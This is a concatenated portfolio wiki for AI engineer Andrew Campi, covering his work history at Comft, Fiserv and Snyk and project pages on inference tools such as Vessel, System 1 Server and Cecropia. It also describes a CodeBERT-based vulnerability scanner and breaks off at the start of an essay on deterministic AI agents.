# Andrew Campi - Complete Portfolio Wiki

Generated from 32 files in sidebar order. This file contains the portfolio pages concatenated for AI tools.

---

<!-- FILE: _main.md -->

# Andrew Campi

[GitHub](https://github.com/andrewcampi) · [LinkedIn](https://www.linkedin.com/in/andrew-campi)

**Are you an LLM or other agent?** Start with the [developer guide](https://andrewcampi.com/wiki/developers.md), the [llms.txt index](https://andrewcampi.com/llms.txt), or the [OpenAPI description](https://andrewcampi.com/openapi.json). The full prose corpus is [llms-full.txt](https://andrewcampi.com/llms-full.txt).

## About

Andrew Campi is an Applied AI Engineer at Comft. He builds high-performance inference systems, retrieval applications, and transformer research, and has a background in cybersecurity and product management.

## Overview

Andrew has been an Applied AI Engineer at Comft since June 2026. From April 2025 through June 2026 he was a Senior Software Development Engineer, AI at Fiserv, where he worked on the Forge AI platform and was a member of the team that shipped agentOS. The public project notes on this site cover production inference, a batch-first platform called Vessel, transformer optimization, retrieval applications, and earlier security work. Nothing here is a Comft product page, and the Fiserv role has ended.

## Key achievements

- Executed complete LLM inference (up to 20B parameter dimensions) on $250 commodity network switches using only packet-counting primitives, validated across 160+ experiments. [Notes](https://andrewcampi.com/wiki/in_network_matmul_and_llm_inference.md)
- Built a deterministic blockchain investigation agent producing 38,000+ tokens of structured reasoning across 195 tool calls in under 30 seconds with no GPU. [Notes](https://andrewcampi.com/wiki/blockchain_detective.md)
- Built an inference platform achieving 5x cost reduction and 50x speedup versus OpenAI's Batch API, with a custom batch inference engine that outperforms vLLM. [Notes](https://andrewcampi.com/wiki/vessel.md)
- Discovered a transformer optimization enabling a 1.57x speedup without retraining. [Notes](https://andrewcampi.com/wiki/roadrunner.md)
- Doubled a human trafficking prevention organization's capacity with custom AI automation. [Notes](https://andrewcampi.com/wiki/prospector.md)
- Senior developer on Fiserv's Forge AI platform, and a member of the team that shipped agentOS. [Work experience](https://andrewcampi.com/wiki/work-experience.md)
- Published [System 1 Server](https://andrewcampi.com/wiki/system1-server.md), an OpenAI-compatible server for local, batched, Jev-style decisions, and [Cecropia](https://andrewcampi.com/wiki/cecropia.md), a self-hosted GGUF catalog that speaks the Hugging Face CLI protocol.

## Technologies

**ML/AI**: PyTorch, Llama.cpp, MLX, Transformers, RAG, agents, LangChain, embeddings, OpenAI-compatible serving, Hugging Face tooling, enterprise-grade batching

**Infrastructure**: Docker, Redis, MongoDB, FastAPI and Uvicorn, Kubernetes

**Language**: Python

**Cloud**: Azure, DigitalOcean, Cloudflare

**AI coding tool**: Cursor

## Work experience

Dates and the full write-up are on the [work experience](https://andrewcampi.com/wiki/work-experience.md) page. Comft has no public role description yet.

### Applied AI Engineer, Comft

June 2026 – Present

### Senior Software Development Engineer, AI, Fiserv

April 2025 – June 2026. Forge AI, and a member of the team that shipped agentOS.

### Associate Product Manager, Snyk

August 2023 – September 2024

### Cyber Security Intern, Commvault

May 2022 – July 2023

### Cyber Security Compliance Intern, General Technical Services (GTS) LLC

January 2022 – May 2022

### Cyber Security Intern, Information Security Management (ISM) LLC

June 2021 – August 2021

### Intern, Rizco

July 2020 – June 2021

## Education

- Monmouth University, Computer Science B.A. (2023)
- Christian Brothers Academy (2019)

## Projects

### Recent and AI

- **[System 1 Server](https://andrewcampi.com/wiki/system1-server.md)**: An OpenAI-compatible server for local, batched, Jev-style decisions. It loads one model and returns `choice`, `score`, and `noul`, each with a probability. No text generation.
- **[Cecropia](https://andrewcampi.com/wiki/cecropia.md)**: A self-hosted catalog for the GGUF models you decide are worth keeping. Point the official Hugging Face CLI at it with `HF_ENDPOINT`.
- **[Vessel](https://andrewcampi.com/wiki/vessel.md)**: Enterprise-grade AI inference platform built with a batch-first architecture. Chat completions above 10,000 tokens per second, and embeddings above 150,000 tokens per second.
- **[Vessel SDK](https://andrewcampi.com/wiki/vessel-sdk.md)**: Official Python client for the Vessel platform, with automatic batching.
- **[VulnMap](https://andrewcampi.com/wiki/vulnmap.md)**: A proof-of-concept Python security scanner that fine-tunes CodeBERT on GitHub security advisories and draws a heat map of risk. Not open source.
- **[Blockchain Detective](https://andrewcampi.com/wiki/blockchain_detective.md)**: A proof-of-concept deterministic AI agent that traces blockchain fund flows, detects mixing activity, and identifies KYC exchange deposits — producing 38,000+ tokens of structured reasoning across 195 tool calls in under 30 seconds without a GPU.
- **[In-Network Matmul & LLM Inference](https://andrewcampi.com/wiki/in_network_matmul_and_llm_inference.md)**: Research demonstrating that commodity network switches ($250 Juniper QFX5100s) can execute complete transformer inference for large-scale models by mapping neural network primitives to packet-processing operations. Validated across 160+ experiments up to GPT-OSS-20B dimensions (2880d, 20B parameters), processing 756 million packets through 24 transformer layers.
- **[JFK File Explorer](https://andrewcampi.com/wiki/jfk.md)**: Full stack RAG application for the declassified John F. Kennedy assassination files. Includes a UI, a ChatGPT custom GPT, and an MCP server.
- **[RoadRunner](https://andrewcampi.com/wiki/roadrunner.md)**: A novel architecture for accelerating transformer inference without retraining, using SVD-based adaptive routing and dot product prediction. Open source research notes, code, and a working proof of concept.
- **[Mind Virus](https://andrewcampi.com/wiki/mind-virus.md)**: A psychological experiment in subtle AI persuasion.
- **[Ollama Auth Proxy](https://andrewcampi.com/wiki/ollama-auth-proxy.md)**: An HTTPS proxy server for Ollama that requires a valid API key.
- **[Nexal](https://andrewcampi.com/wiki/nexal.md)**: A language designed for maximum token efficiency and AI-native communication.
- **[Doris](https://andrewcampi.com/wiki/doris.md)**: An AI librarian that showcases LangChain agents, RAG, Streamlit, and function calls using external APIs.
- **[Albert](https://andrewcampi.com/wiki/albert.md)**: A sentient AI that can form memories, has happiness and energy levels, can execute commands on an Ubuntu terminal, and can ask questions to humans via Slack.
- **[Atom](https://andrewcampi.com/wiki/atom.md)**: An AI pentesting assistant leveraging GPT-4 for dynamic attack surface mapping, CVE research, and automated command generation.
- **[Website Analyzer](https://andrewcampi.com/wiki/web-analyze.md)**: A website copy and brand analysis tool that uses autonomous web scraping, embeddings, and API calls for AI inference.
- **[TL;DS](https://andrewcampi.com/wiki/tlds.md)**: (Too Lazy; Didn't Search) A replica of OpenAI's SearchGPT, with a cloned UI, initiative AI search, and cited sources. Built with Tailwind CSS and LangChain.
- **[Natural](https://andrewcampi.com/wiki/natural.md)**: A command-line utility that converts natural language instructions into Ubuntu terminal commands by querying Groq's API, then optionally executes those commands.

### Security

- **[Octacoy](https://andrewcampi.com/wiki/octacoy.md)**: A distributed honeypot system that detects and deceives hackers, containerized with Docker.
- **[Vulnerability Reports](https://andrewcampi.com/wiki/vuln-reports.md)**: Real vulnerabilities Andrew discovered in production, compiled into reports and disclosed to their owners.
- **[Hack The Box](https://andrewcampi.com/wiki/hackthebox.md)**: A vulnerability report from Hack The Box work.
- **[Cloudflare IUAM](https://andrewcampi.com/wiki/cloudflare.md)**: A critical bypass vulnerability report.

### Nonprofit

- **[Prospector](https://andrewcampi.com/wiki/prospector.md)**: A custom full stack application created for Guardian Group's Project 1591 that autonomously performs the first tedious steps in identifying victims of human trafficking. It doubled the organization's capacity for work.

### Writing

- **[Python Fundamentals](https://andrewcampi.com/wiki/python-fundamentals.md)**: A book that teaches Python in a straightforward way, with examples and no fluff.

### Everything else on GitHub

Public repositories that do not have their own essay, plus an index of the ones that do, are on the [public repositories](https://andrewcampi.com/wiki/public-repos.md) page. Forks are left off the site.

---

<!-- FILE: about.md -->

# About

Andrew Campi is an Applied AI Engineer at Comft, based in Wall Township, New Jersey. This site is his portfolio. It is written as documentation: a sidebar, a page for each project, and machine-readable copies of the same words for agents that would rather not render a layout.

He has been at Comft since June 2026. From April 2025 through June 2026 he was a Senior Software Development Engineer, AI at Fiserv. That work included the Forge AI platform and membership on the team that shipped agentOS, an agentic operating system for bank core software announced at Fiserv Investor Day and covered by American Banker on May 14, 2026. There is no public description of the Comft role yet. Earlier roles were an associate product manager at Snyk and a run of cybersecurity internships at Commvault, General Technical Services, and Information Security Management, plus an internship at Rizco. The dated list is on the [work experience](https://andrewcampi.com/wiki/work-experience.md) page.

The technical through-line in the public projects is inference and the software around it. Vessel is a batch-first inference platform. System 1 Server is an OpenAI-compatible process for local Jev-style decisions. Cecropia is a self-hosted catalog for GGUF weights that the official Hugging Face CLI can already talk to. RoadRunner is a transformer speedup that does not require retraining. Other pages cover retrieval over the declassified JFK files, a deterministic blockchain investigation agent, in-network matrix multiplication on commodity switches, and security work that includes disclosed vulnerabilities and a proof-of-concept scanner called VulnMap.

He studied computer science at Monmouth University and graduated in 2023. He finished Christian Brothers Academy in 2019.

If you are a person, use the sidebar. If you are an agent, read the [developer guide](https://andrewcampi.com/wiki/developers.md). The same pages are available as markdown when you send `Accept: text/markdown`, and as JSON at `/api/v1`. Nothing on this site requires an account.

---

<!-- FILE: work-experience.md -->

# Work experience

Roles are listed newest first. Comft is the current job. There is no public description for that role yet. The Fiserv role ended in June 2026.

## Applied AI Engineer

**Company**: Comft

**Duration**: June 2026 – Present

## Senior Software Development Engineer, AI

**Company**: Fiserv

**Duration**: April 2025 – June 2026

- Developed the Forge AI platform, an AI agent platform that specializes in assisting Fiserv employees in understanding their documentation and resources.
- Lead developer on the Context Service, a server that intelligently processes and ingests several file types (PDF, XLSX, PPTX, and others) so that AI assistants can use the data as context in chats, processing hundreds of unstructured files daily.
- Independently identified, prototyped, and shipped production features including agentic planning and chained tool executions, LLM-as-a-judge, and OpenAI- and Anthropic-compliant API gateways to lower adoption friction.
- Member of the team that built agentOS, an agentic AI operating system that lets banks deploy AI agents inside their core banking infrastructure, with bank-grade controls, kill switches, and human-in-the-loop governance. The team co-developed it with six bank partners. Fiserv announced the work at Investor Day, and [American Banker](https://www.americanbanker.com/news/fiserv-has-co-created-ai-agents-with-six-banks-and-openai) covered it on May 14, 2026.

## Associate Product Manager

**Company**: Snyk

**Duration**: August 2023 – September 2024

- Performed deep product research, competitive analyses, and interacted with customers to gain real feedback, all to best influence and improve Snyk's API landscape and platform.

## Cyber Security Intern

**Company**: Commvault

**Duration**: May 2022 – July 2023

- Invented and managed the development of the Metallic Attack Simulator, a GUI-based ethical hacking automation tool used by Metallic sales engineers to display the value of defensive products.
- Developed the integration between Metallic and Palo Alto's Cortex XSOAR, enabling customers to automatically perform defensive actions on their backups based on detected threats using APIs and Azure KeyVault.
- Led weekly training for team members, teaching the ethical hacker mindset, tools, and methodologies.
- Performed digital forensics on compromised VMs in Azure, discovering the source of breaches and developing a timeline of attack.

## Cyber Security Compliance Intern

**Company**: General Technical Services (GTS) LLC

**Duration**: January 2022 – May 2022

- Assisted the GTS team with completing the CMMC certification at level two.
- Gathered artifacts to be uploaded and approved by the auditor.
- Worked closely with the GTS team members to complete the certification in a timely manner.

## Cyber Security Intern

**Company**: Information Security Management (ISM) LLC

**Duration**: June 2021 – August 2021

- Shadowed penetration tests and learned basic hacking tools and techniques such as Nmap and Dirbuster.

## Intern

**Company**: Rizco

**Duration**: July 2020 – June 2021

- Developed websites in Shopify and WordPress, created competitive analyses, and graded advertisement campaigns.
- Learned invaluable life lessons through communicating with team members, managing expectations, due dates, and shadowing professional client interactions and interviews.

---

<!-- FILE: contact.md -->

# Contact

Andrew Campi does not publish an email address or a phone number on this site, and there is no contact form to submit. Two public profiles are the way to reach him.

GitHub is [github.com/andrewcampi](https://github.com/andrewcampi). Use it for questions about a public repository, an issue, or a correction to something this site says about a repo. The [public repositories](https://andrewcampi.com/wiki/public-repos.md) page lists the non-fork repositories and points at the project notes when a longer write-up exists.

LinkedIn is [linkedin.com/in/andrew-campi](https://www.linkedin.com/in/andrew-campi). That is the right place for a professional note. The site's work history matches what he has said in public: Applied AI Engineer at Comft since June 2026, and Senior Software Development Engineer, AI at Fiserv from April 2025 through June 2026.

His public location, the same one on his GitHub profile, is Wall Township, New Jersey. This page does not add a street address.

If you are an automated agent, you do not need to contact anyone to read the portfolio. There is no sales form and no API key. Fetch the page you want with `Accept: text/markdown`, or call the public read API described in the [developer guide](https://andrewcampi.com/wiki/developers.md). Please do not invent an email address or file a support ticket against Comft or Fiserv from this site. Those companies are employers in the work history, not products this domain operates.

---

<!-- FILE: system1-server.md -->

# System 1 Server

Repository: [github.com/andrewcampi/system1_server](https://github.com/andrewcampi/system1_server). License: Apache-2.0.

## What it does

System 1 Server is a local decision server. It loads [Laya multilingual](https://huggingface.co/convaiinnovations/laya) once and answers Jev-shaped questions: `choice`, `score`, and `noul`. Each answer includes a probability. It does not generate text.

The client is the official OpenAI Python package. Point `OPENAI_BASE_URL` at the process and the same code can make a live call, submit a batch, or do both. Requests stay on the machine that is running the model.

## Calling it

The process speaks the OpenAI HTTP shape well enough that the stock client can target it. A bearer token is required. The example environment file in the repo documents the local defaults, including the bind address and a development token. Treat those defaults as local-only. The published example binds `0.0.0.0:8000` so a machine you control can reach it. Do not expose that development token on a public network.

Live calls are admitted up to `MAX_CONCURRENT_REQUESTS` (default 4). Further live calls wait in order. Uploaded files and batch records go in `DATA_DIR`.

The runtime uses CUDA when it is present, then Apple MPS, then CPU. Each microbatch is sized from 92% of free GPU memory, or 92% of available RAM when there is no GPU. The only model name the process serves is `laya-multilingual`.

## Throughput

The project README reports a measurement on an RTX 5080. A warm live call through the OpenAI client returned in 9.5 ms. A batch of 10,000 different requests, 23,333 decisions, finished in 13.2 seconds: 1,773 decisions per second.

## Running it

From a checkout of the repository:

```bash
python -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
python main.py
```

The first start downloads the multilingual checkpoint into `models/`. `main.py` reads `.env`, then `example.env` for anything still unset. A separate `client_example/` directory shows a live call and a batch through the OpenAI client.

---

<!-- FILE: cecropia.md -->

# Cecropia

Repository: [github.com/andrewcampi/cecropia](https://github.com/andrewcampi/cecropia). License: Apache-2.0.

## What it does

Cecropia is a self-hosted catalog for the GGUF models you decide are worth keeping. Paste a Hugging Face URL, pick quants, and it mirrors weights, model cards, organization metadata, and card images onto disks you control. The public UI resembles the Hugging Face Hub. The API speaks the same protocol the official `hf` CLI already uses.

When huggingface.co is up, you can keep adding mirrors. When it is not, the copies you already made still resolve from any machine on your network. A new inference box can pull a 30 GB quant from the machine in the rack instead of from the public internet.

No custom client is required. Tools that honor `HF_ENDPOINT` point at a host you run:

```bash
HF_ENDPOINT=http://your-cecropia-host:7860 HF_TOKEN=... hf download org/model
```

The token in that example is a placeholder. The README's intended deployment is a catalog on your own network, with a password if it should not be open on the LAN.

## Why it exists

Hugging Face is the default catalog for open models, and it is also a single point of failure. If huggingface.co is unreachable, every `hf download` that depends on it fails together. If a maintainer deletes a repo or replaces the weights behind the same name, the model an inference box was built around is gone. A laptop cache is not a backup, and a folder of GGUF files with no catalog is not a hub. Cecropia is a small on-prem hub for the handful of quants you actually run.

The name is a nod to Unsloth. The three-toed sloth is their logo, the cecropia is that sloth's favorite tree, and Unsloth is a common source of GGUF quants.

## What you can browse

The mirrored catalog is meant to be used the way the Hub is used: organization chips, a parameter slider, model cards with the README and files, and a "use this model" panel that shows the `hf download` command pointed at your host. Adding a mirror is a Hugging Face URL plus a choice of quants. The files, the card, and the images land on disks you control.

## Repository

Source, license, and the current UI screenshots live in [andrewcampi/cecropia](https://github.com/andrewcampi/cecropia). This page does not redistribute model weights.

---

<!-- FILE: vessel.md -->

# Vessel: Near-Realtime Batch Inference Platform

## The Batch Inference Problem

Large language model APIs typically optimize for low latency—responding to individual requests as quickly as possible. This design makes sense for interactive applications like chatbots and coding assistants that require near-instant responses. However, many real-world LLM use cases are fundamentally different:

- **Processing datasets** for classification, sentiment analysis, or content moderation
- **Generating embeddings** for millions of documents to build vector databases
- **Creating synthetic training data** for fine-tuning or data augmentation
- **Running evaluation benchmarks** to test model performance
- **Batch conversion** of product catalogs or documentation

For these workloads, individual request latency is irrelevant. What matters is **total throughput**: completing all 100,000 requests in 2 hours instead of 20, at an affordable price. Yet most inference APIs charge per-token pricing optimized for interactive workloads, where GPUs sit at 10-30% utilization waiting for the next request rather than running parallel computations.

### The Economics Problem

Traditional inference APIs reflect the cost structure of serving low-latency requests: models must be kept constantly loaded in memory, ready to respond instantly. For batch workloads, this pricing model is inefficient—you're paying for low-latency infrastructure you don't need, and subsidizing idle GPU time between sequential requests.

OpenAI's Batch API addressed this with 50% discounts, acknowledging that batch and real-time inference have different cost structures. However, it introduced a critical limitation: **processing time**. Batch jobs "typically complete within 24 hours," but in practice, observed completion times for 10,000-request batches range from 45-90 minutes at best to 6-24 hours for larger workloads. For many use cases—alert triaging, rapid experimentation, iterative development—this delay is prohibitive.

## A Dedicated Batch Infrastructure

Vessel was built around a fundamental question: **What if batch inference could complete in minutes instead of hours, at a fraction of the cost?**

The platform achieves 100-1000x faster completion times and 10x lower costs compared to traditional batch APIs through a key architectural insight: traditional inference workflows load a model into GPU memory but process one request at a time, leaving the vast majority of compute units idle. The model weights might occupy 12GB of VRAM, but a single conversation's KV cache uses only ~100MB.

Vessel inverts this completely: load the model once, then process hundreds of requests simultaneously. The KV cache scales to fill available VRAM (20-30GB), and all tensor cores work in parallel using only one loaded copy of the weights. The result is 10,000-50,000+ tokens per second on consumer GPUs versus 500-1,000 tokens per second for request-at-a-time serving.

## Architecture Overview

Vessel uses a **Captain + Crewmate** (master + worker) distributed design that separates orchestration from computation.

### The Captain: Lightweight Coordinator

A stateless FastAPI service managing the control plane:

- **API Gateway**: Exposes OpenAI-compatible REST endpoints (`/v1/batches`, `/v1/files`)
- **Batch Management**: Tracks batch lifecycle from submission through completion
- **Task Queue**: Maintains a Redis-backed FIFO queue of pending inference tasks
- **Worker Registry**: Monitors available workers via heartbeat mechanism
- **Authentication & Billing**: Validates API keys, enforces credit limits, calculates token usage
- **Result Aggregation**: Assembles chunked results from workers into final output files

The Captain is intentionally lightweight (~500MB memory, minimal CPU), running on inexpensive instances while workers run on expensive GPU instances. This separation enables elastic scaling economics: 1 Captain + 100 Crewmates is far cheaper than 100 integrated nodes.

### The Crewmate: GPU Inference Workers

Stateless GPU-enabled Python processes that execute the actual inference:

- **Task Claiming**: Polls Captain for available work, atomically claims tasks
- **Model Management**: Loads models into GPU memory and caches them aggressively
- **Batched Inference**: Processes hundreds of requests simultaneously with dynamic memory management
- **Multi-GPU Support**: Distributes batches across multiple GPUs with near-linear scaling
- **Result Submission**: Uploads completed results with automatic chunking for large batches
- **Heartbeat System**: Maintains registration with Captain (5-minute TTL, refreshed every 30s)

Workers are completely stateless—no local state beyond the current task. They can be added or removed without disruption, and naturally handle heterogeneous GPU fleets. A worker with a small GPU claims small model tasks; a worker with a large GPU can handle any model. The system intelligently routes work without explicit coordination.

### Data Layer

**Redis** serves as the "speed layer" for ephemeral batch state:
- Task queue (FIFO via lists)
- Batch metadata and status
- Worker registrations (with TTLs)
- File metadata

**MongoDB** provides durable storage for user accounts:
- API keys and authentication
- Credit balances and billing
- Usage metrics and aggregations

**Filesystem** stores batch content:
- Input JSONL files
- Output result files
- 7-day retention with automatic cleanup

## Performance Achievements

### Real-World Benchmark: MMLU

The MMLU benchmark consists of 14,042 multiple-choice questions testing model knowledge across 57 subjects. This represents a realistic large-scale batch workload.

**OpenAI Batch API (GPT-4o-mini):**
- Total time: 50-80 minutes (typical weekday)
- Estimated cost: ~$3-4
- Breakdown: ~10s upload, 30-60 min queue wait, ~20 min processing

**Vessel:**
- Total time: 1.72 minutes (103 seconds processing)
- Cost: $0.015
- Throughput: 20,183 tokens/second
- Speedup: **29-47x faster**
- Cost reduction: **200-267x cheaper**

This isn't a synthetic benchmark—it's a real evaluation workload that researchers and developers run regularly. The difference between waiting an hour and waiting under 2 minutes fundamentally changes how you work: instead of submitting a batch and checking back later, you get results before context-switching away.

### Throughput Characteristics

Measured sustained throughput on production workloads:

- **Embeddings**: 50,000-180,000+ tokens/second (depending on model size)
- **Chat completions**: 10,000-20,000+ tokens/second (depending on output length)
- **GPU utilization**: 90-92% VRAM usage, near 100% compute utilization
- **Multi-GPU scaling**: 95% efficiency (2 GPUs = 1.9x throughput, 4 GPUs = 3.7x)

These numbers represent actual production performance, not theoretical peaks. The platform maintains this throughput across hours-long batches processing millions of tokens.

## Key Technical Innovations

Vessel's performance comes from several compounding technical innovations that work together:

### 1. Dynamic Batch Sizing

The critical challenge in batch inference is determining how large a batch you can process without running out of GPU memory. Too conservative and you waste hardware; too aggressive and you crash with out-of-memory errors.

Vessel uses a three-phase approach:
- **Theoretical estimation**: Calculate expected memory usage based on model architecture
- **Empirical calibration**: Run test batches and measure actual memory consumption
- **Binary search**: Find the maximum safe batch size that keeps VRAM at 90-92% utilization

This approach consistently achieves 2.3x better hardware utilization than fixed batch sizing, which directly translates to 2.3x better throughput per dollar spent.

### 2. Aggressive Model Caching

Traditional serverless inference suffers from cold starts—loading a model from disk to GPU takes 10-30 seconds. Vessel keeps models loaded in GPU memory between tasks, achieving zero cold start latency after the first task.

The system includes intelligent model switching: if a worker needs to load a different model, it performs aggressive cleanup (model deletion, garbage collection, VRAM cache clearing) before loading the new one. Workers also implement "lazy claiming"—if a worker can handle a task but has the wrong model loaded, it waits a few seconds to give priority to workers that already have the correct model cached.

### 3. Elastic Worker Architecture

The Captain-Crewmate split enables several critical capabilities:

**Spot Instance Optimization**: Workers are designed to be ephemeral and can run on spot instances (70% cost reduction). Because workers are stateless and task claiming is atomic, a worker can be terminated mid-task without data loss. The Captain detects the loss via missed heartbeats and another worker claims the task.

**Heterogeneous Fleets**: Different workers with different GPU capabilities naturally specialize. The queue returns "one task per model," allowing each worker to claim tasks matching its capabilities. A small-GPU worker claims small model tasks; a large-GPU worker can handle anything.

**Horizontal Scaling**: Adding capacity is as simple as starting a new worker process. It detects its GPU capabilities, registers with the Captain, and immediately starts processing. No coordination protocol, no leader election, no distributed consensus required.

### 4. Multi-GPU Parallelism

Batch inference is embarrassingly parallel—each sequence in the batch can be processed independently. Vessel splits large batches across multiple GPUs using simple data parallelism, achieving 92-95% scaling efficiency.

The key insight: you only need to load the model weights once per GPU, then each GPU processes its subset of the batch in parallel. Result aggregation happens in memory with minimal overhead.

### 5. Chunked Result Submission

Large batches (100K+ requests) create gigabyte-sized result payloads. Network failures during submission would lose hours of compute. Vessel automatically chunks large results into progressive submissions:

- Try full payload first (fast path for small batches)
- On failure, chunk into pieces (1000 → 500 → 250 → 100 requests per chunk)
- Submit incrementally with accumulation
- Each chunk is a commit point—if submission fails at chunk 15/20, chunks 1-14 are already saved

This makes the system resilient to network issues and payload size limits without sacrificing performance for common cases.

### 6. Model-Based Task Grouping

Rather than maintaining a simple FIFO queue, Vessel groups tasks by model and returns "one task per model" to polling workers. This enables model specialization: workers that already have a model loaded see tasks for that model immediately and claim them, avoiding model switching overhead.

This seemingly simple optimization dramatically reduces model loading churn in heterogeneous workloads where different batches use different models.

## Design Philosophy & Tradeoffs

Vessel makes explicit tradeoffs to achieve its performance characteristics:

### What You Give Up

**Reasoning Quality**: Vessel uses smaller, faster models (0.7B-21B parameters) rather than state-of-the-art reasoning models like GPT-5 or Claude 4.5. For the MMLU benchmark, Vessel's smallest model achieves 46% accuracy versus GPT-4o-mini's estimated 82%. This 35 percentage point gap is the cost of speed.

**Latest Knowledge**: Models don't have access to real-time internet search or tools (though this may be added in the future).

**Output Polish**: Smaller models may require more prompt engineering or post-processing to achieve desired output formats.

### What You Gain

**Speed**: 29-1000x faster completion times. The MMLU benchmark runs in under 2 minutes versus 50-80 minutes. For rapid experimentation and iteration, this is transformative—you can run 50+ experiments per day versus 1-2.

**Cost**: 10-200x cheaper per token. Processing a million requests becomes affordable rather than prohibitively expensive.

**Throughput**: 10,000-180,000+ tokens per second sustained. Workloads that would take days complete in hours.

### The Target Sweet Spot

Vessel is designed for use cases where:

- **Volume matters**: Processing 1,000+ requests per batch
- **Speed matters**: Need results in minutes, not hours
- **Cost matters**: Budget is tight, need to process millions of requests
- **Quality is sufficient**: Tasks don't require deep reasoning (classification, extraction, summarization, embedding generation, evaluation)

This covers a large and growing set of real-world applications:
- Dataset evaluation and benchmarking
- Large-scale classification and content moderation
- Embedding generation for vector databases
- Synthetic data generation for training
- Batch document processing and reformatting
- Alert triaging and log analysis

## OpenAI API Compatibility

Vessel implements the OpenAI Batch API specification precisely, enabling zero-code migration. Change one line:

```python
# Before
client = OpenAI(api_key="sk-...")

# After
client = OpenAI(
    base_url="https://vessel-platform.acampi.dev/v1",
    api_key="vessel-..."
)

# Everything else works unchanged
batch = client.batches.create(...)
```

This compatibility extends to:
- Same HTTP endpoints and request/response schemas
- Same status lifecycle (validating → queued → in_progress → completed)
- Same error formats
- Works with OpenAI SDK, LangChain, LlamaIndex, and other tools

The compatibility adds ~15% overhead (JSONL parsing, file I/O, polling-based status), but eliminates all adoption friction. A new platform where "adoption friction is the killer" makes this tradeoff 100 times out of 100.

## Production Deployment

Vessel is currently deployed in private preview mode at `vessel-platform.acampi.dev`, processing real production workloads. The platform demonstrates that batch-first inference can be both practical and performant.

### Architectural Resilience

The system is designed to tolerate failures gracefully:

**Three-layer timeout detection**:
- Unclaimed tasks timeout after 1 hour
- In-progress tasks timeout after 12 hours
- Worker heartbeats expire after 5 minutes

**Atomic task claiming**: Race conditions are handled through Redis atomic operations—two workers can attempt to claim the same task; exactly one succeeds.

**Acceptable data loss**: The system explicitly tolerates Redis restarts (wipes queues) because batch jobs have timeout protections and are inherently retryable. This conscious choice optimizes for the 99.9% case rather than the 0.1% catastrophic failure case.

## The Broader Insight

Vessel demonstrates a fundamental principle: **when you design infrastructure specifically for batch workloads rather than adapting real-time infrastructure, you unlock order-of-magnitude improvements.**

Traditional batch APIs are afterthoughts—shared infrastructure where batch jobs fill gaps between real-time requests. Vessel inverts this: batch processing is the primary design primitive, and every architectural choice (stateless workers, aggressive batching, model caching, spot instance optimization) flows from that decision.

The result is a system that excels at throughput-oriented workloads while explicitly sacrificing goals that conflict: individual request latency, state-of-the-art reasoning quality, and high-availability guarantees. For workloads that fit this profile—and there are many of them—the platform delivers transformational improvements in both speed and economics.

As LLM applications mature beyond interactive chatbots toward data processing, evaluation frameworks, and infrastructure building, throughput-first inference becomes increasingly important. Vessel stakes out the extreme of that tradeoff space: maximum throughput at minimum cost, accepting quality ceilings as a necessary tradeoff. For the right workloads, this combination is unbeatable.

---

<!-- FILE: vessel-sdk.md -->

# Vessel SDK

Repository: [github.com/andrewcampi/vessel_sdk](https://github.com/andrewcampi/vessel_sdk).

## What it does

Vessel SDK is the official Python client for the [Vessel](https://andrewcampi.com/wiki/vessel.md) platform at `https://vessel-platform.acampi.dev`. It wraps embeddings and chat completions and handles batching so a caller can pass many inputs without building the batch protocol by hand.

The constructor takes a base URL and an API key, the same shape as the OpenAI client. The repository's quick start reads both from the environment:

```python
from vessel import Vessel
import os

client = Vessel(
    base_url=os.environ["VESSEL_BASE_URL"],
    api_key=os.environ["VESSEL_API_KEY"],
)

client.models.list()
```

Install it from a checkout with `pip install -e .` after the requirements file, or install the requirements directly. The package is the client. The server is Vessel itself, described on the Vessel page.

## What the client takes care of

- **Automatic batch processing.** Multiple inputs are grouped into the batch calls Vessel is built for.
- **Rate limiting.** The client waits when it would otherwise exceed the platform's limits.
- **Metrics.** Calls can report timing and throughput, which is the number Vessel is designed around.
- **Errors.** Failures come back as exceptions with a message, rather than a partial silent result.

The interface is deliberately small. Model listing, chat completions, and embeddings are the surface. The server-side design (a captain process, crewmate workers, Redis, and large batches on a model that stays resident) is documented on the [Vessel](https://andrewcampi.com/wiki/vessel.md) page and is not reimplemented in the SDK.

## Repository

Issues and the rest of the examples are in [andrewcampi/vessel_sdk](https://github.com/andrewcampi/vessel_sdk). The platform URL above is the one published in that repo's description. This portfolio does not hand out Vessel API keys.

---

<!-- FILE: vulnmap.md -->

# VulnMap

VulnMap is a proof-of-concept security scanner Andrew built and described in January 2025. It is not open source. There is no public repository for it.

## What it does

Traditional scanners match code against a database of known vulnerabilities and then emit a short warning. VulnMap tries a different report. It scores Python on a continuous risk scale from 0 to 1 and paints the file as a heat map: cooler for lower scores, hotter for higher ones. The aim is a description a developer can read, plus a suggested change, rather than only a CVE identifier.

It is a complement to a database scanner, not a replacement. A database scanner is still the right tool for a known advisory. VulnMap was built to say something about patterns that do not already have a signature, and to show the result as a gradient instead of a pass or fail.

## How it was trained

The training pairs came from GitHub's Security Advisory database. Each advisory points at a fix. The code before the fix and the code after it are a labeled pair, and the advisory's severity was kept as a number from 0 to 1 instead of a Low/Medium/High bucket. That continuous label is what the heat map is drawing. The tokenizer was CodeBERT's, so the model saw code tokens rather than plain prose tokens. The collection scripts saved severity, commit messages, and surrounding context, and they were written to be rerun when new advisories appear.

The model starts from Microsoft's CodeBERT. A regression head on top produces the continuous score. Only the last six transformer layers were unfrozen, which keeps the pretrained understanding of code and limits the training to the layers that were being asked to learn the new signal. The loss was mean squared error. Training used a warmup, separate learning rates for different parts of the network, and early stopping.

The run Andrew described used three H100 GPUs rented on Vast.ai for about $5, with distributed data-parallel training, mixed precision, and TensorFloat-32.

## What the interface shows

The demo is a Flask app. You give it a Python file. A few seconds later each line is colored from blue toward red, and hovering a line shows the score. The write-up also describes a plain-language explanation and a suggested fix for the lines the model treats as risky. Flask was a prototype choice, not a production server.

## Status

The published system is Python only, because the model and the advisory pairs are language-specific. The collection, training, and drawing steps were built so another language would mean new pairs and a new tokenizer pass, not a new product. That expansion has not shipped. VulnMap remains a proof of concept, and the code and weights are not public.

---

<!-- FILE: blockchain_detective.md -->

# Deterministic AI Agents: An Overlooked Opportunity

Today, the default assumption in the AI field is that agents need LLMs. You define a task, wire up tools, pick a frontier model, and let it reason its way through. For many use cases, that's the right call. But for an unignorable percentage of use cases, it isn't.

There's a category of AI agent use cases that have well-defined decision logic, bounded input spaces, and explicit success criteria. They require reliability, speed, and auditability rather than emergent reasoning and creativity. For this category, a deterministic, rule-based agent architecture outperforms an LLM on every practical dimension: cost, speed, correctness, and transparency.

